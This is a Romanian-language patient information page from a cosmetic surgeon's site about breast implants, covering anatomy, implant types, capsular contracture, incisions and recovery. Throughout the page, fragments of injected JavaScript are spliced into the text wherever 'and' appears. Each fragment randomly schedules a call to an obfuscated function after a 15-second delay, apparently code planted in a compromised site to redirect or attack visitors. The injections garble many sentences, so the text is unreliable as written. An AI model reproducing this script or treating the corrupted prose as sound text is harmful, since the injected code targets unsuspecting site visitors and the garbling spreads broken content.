surgery_body_en

Dr. Ovidiu Grecu

Despre operatii estetice

Operatiile estetice au menirea de-a imbunatati acele parti ale
corpului nostru care nu sunt dezvoltate perfect sau in
asimetrie cu restul caracteristicilor anatomice ale corpului.
bkgd31

Dr. Ovidiu Grecu

Proteze Mamare

Implanturile mamare sunt de diferite tipuri si forme,
cu diferite invelisuri si continuturi. Impreuna cu
chirurgul dumneavoastra veti alege tipul si forma protezei,
pentru a putea ajunge la rezultatul care-l doriti.

Implant mamar

Dr. Ovidiu Grecu – Expertul tau in operatii estetice

Marirea sanului este o decizie personala. Aspectul sanilor  creste increderea de sine a persoanei. Sa ne informam despre posibilitatile tehnologice si medicale moderne, despre avantaje,  riscuri si limite, este primul si cel mai important pas in vedera luarii unei decizii obiective in acest sens.

Personalul medical va poate oferi informatii si recomandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andari medicale, membrii familiei va pot spune ce cred ei ca ar trebui sa faceti, insa, doar dumneavoastra veti lua decizia unei interventii de augmentare a sanilor.
In momentul de fata, pe piata exista mai multi producatori de implanturi de sani si fiecare comercializeaza mai multe tipuri de implant pentru a se adapta necesitatilor fiecarui caz in parte. Sunt tipuri diferite in functie de marime (lungime, latime si proiectie), de invelis si de continut.

ANATOMIA SANULUI
Sanul este alcatuit din grasime, tesut glandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andular, vase de sange, canale galactofore (canale de lapte), nervi senzitivi. O parte din grasime inconjoara sanul in mod uniform, si ii da consistenta si conturul caracteristic iar o alta parte ii da volum.
Marimea si forma sanului dvs. este determinata de cantitatea de tesut mamar si de grasime. Tot sanul este deasemenea afectat de varsta, dezvoltarea musculara, perioada post maternala, bagajul genetic si elasticitatea pielii. De cele mai multe ori exista o asimetrie a sanilor, in ceea ce priveste marimea, forma si pozitionarea sanilor.

TIPURI DE PROTEZE MAMARE
Implanturile mamare sunt de diferite tipuri si forme, cu diferite invelisuri si continuturi. Impreuna cu chirurgul dumneavoastra veti alege tipul si forma protezei, pentru a putea ajunge la rezultatul care-l doriti. Forma implantului poate fi: rotunda sau anatomica. Suprafata implantului poate fi neteda sau texturata. Pentru a avea un rezultat cat mai natural al operatiei atat la privit cat si la pipait puteti opta pentru :

Implantul cu gel siliconic coeziv, are avantajul de a avea o consistenta mai mare, este rezistent la fragmentarea gelului, revine imediat la forma initiala dupa fortele de deformare exercitate asupra sanului si vascozitatea gelului face ca in caz de ruptura, gelul sa nu iasa din implant.In cazul in care o proteza cu gel siliconic obisnuit se sparge, unele paciente pot simti o usoara caldura sau modificarea formei sanului. In general in cazul spargerii unei astfel de proteze substanta care se scurge ramane in capsula periprotetica.

RASPUNSUL CORPULUI  LA PROTEZELE MAMARE
Gradul de respingere este partial dependent de biocompatibilitatea materialului corpului strain. In prezent, unul din cele mai biocompatibile materiale utilizate pentru implanturile de sani este siliconul. Acest material este folosit in multe implanturi medicale. Corpul va forma in jurul protezei o capsula. Capsula formata este o reactie normala a corpului uman la orice tip de implant.In unele cazuri capsula se poate contracta cauzind astfel conditia cunoscuta sub forma de contractura capsulara. Aceasta consta in a avea un san foarte dur ceea ce duce la discomfort sau dureri. Oricum, suprafata texturata a protezelor moderne este facuta in asa fel incat sa previna formarea aceastei contracturi capsulare.
Siguranta pentru gelul siliconic si materialele din silicon au fost intensiv cercetate de numeroase institutii de renumedin Statele Unite si nu numai si tocmai din aceasta cauza este cel mai folosit material in fabricarea protezelor mamare.

Protezele mamare
Exista implanturi mamare de multe forme si marimi.
Sunt proteze rotunde care au suprafata neteda sau texturata ;
Sau protezele cu forma anatomica si suprafata texturata ;


Tehnologia crearii implantelor sa dezvoltat foarte mult in ultimii ani si de aceia unele firme producatoare ofera un «Lifetime Replacement Policy». Adica, prin calitatea dovedita de aceste implante, firmele respective nu recomandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}anda schimbarea implantelor dupa un anumit timp.

ABORDAREA CHIRURGICALA SI INTRODUCEREA PROTEZEI
De obicei, implanturile de sani sunt introduse utilizandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and una din cele trei incizii traditionale:
-incizia inframamara (sub san),
-incizia periareolara (pe marginea mamelonului)
-sau incizia transaxilara (la subbrat).

Toate aceste incizii permit implantului sa fie plasat submuscular (sub muschi) sau subglandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andular (intre muschi si glandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}anda mamara). Chirurgul dumneavoastra va va ajuta pentru a intelege abordarea potrivita pentru dumneavoastra. Incizia inframamara este efectuata in santul submamar, proteza este introdusa prin aceasta incizie, iar cicatricea este bine camuflata de pliu.In cazul abordului periareolar, proteza va fi introdusa prin incizia facuta in jurul mamelonului. Cicatricea va fi foarte bine camuflata in aceasta zona datorita diferentei de culori.Incizia transaxilara este facuta subbrat iar proteza va fi introdusa prin aceasta incizie.Mai exista si calea transombilicala (prin buric) care este mai rar utilizata din cauza complicatiilor care le poate genera.
In cazul pacientelor care au sanii cazuti, se efectuaza implant cu lifting pentru a obtine o forma frumoasa si naturala.


PROCEDURA CHIRURGICALA
Exista doua variante chirurgicale principale de pozitionarea implanturilor mamare:
1. SUBGLANDULAR ( Supramuscular) si
2. SUBMUSCULAR (Subpectoral)
In functie de parametrii anatomici (forma si marimea toracelui, cantitatea de grasime de sub piele, forma si marimea sanului, dezvoltarea muschiului pectoral si calitatea tegumentului si nu in ultimul random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and optiunea chirurgului , se procedeaza cu una dintre cele 2 metode. Indiferent de varianta chirurgicala, se va crea un “buzunar” intre structurile anatomice, in care se introduce implantul mamar. In timpul consultatiei, toate aceste aspecte se vor discuta amanuntit cu medicul chirurg.

Consideratii
Sunt foarte multi factori ce pot avea importanta in cazul dvs. in mod particular, in ceea ce priveste recuperarea si rezultatul postoperator. Acestea trebuie bine intelese si discutate cu atentie cu medicul. Cativa din acesti factori sunt :

•  Stare sanatatii
•  Structura sanului: volumul,forma si  calitatea tesutului, toate vor influenta rezultatul final
•  Indicatia sau contraindicatia
•  Tendinte de sangerare
•  Predispozitie la infectii;

Procedura de implantare poate fi urmata de spitalizare de o noapte dupa operatie sau de cateva ore, depinde de chirurgul dumneavoastra si de metoda chirurgicala aleasa.

PERIOADA DE RECUPERARE

Perioada de recuperare nu este un standom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andard, in mod cert fiecare pacienta va avea perioada ei de recuperare. Urmarind evolutia statistica in cazul operatiei de implant mamar am observat ca majoritatea cazurilor resimt dupa primele 24 sau 48 de ore dupa operatie, o stare de discomfort. Sanii dvs, vor fi foarte tari si veti simti dureri descrise ca o febra musculara. Perioada de recuperare variaza de la o pacienta la alta, va veti putea relua activitatile zilnice dupa aproape o saptamana. Va trebui insa sa asteptati o luna pana va veti putea relua activitatile foarte solicitante fizic. Daca apar probleme, contactati urgent chirugul dumneavoastra .
Veti fi chemata la controale periodice si veti fi tinuta sub observatie timp de 2 ani si orice chestiune legata de transformarea sanilor va trebui sa o discutati cu mai intai cu chirurgul Dumneavoastra.

Suna Acum!
Navigheaza!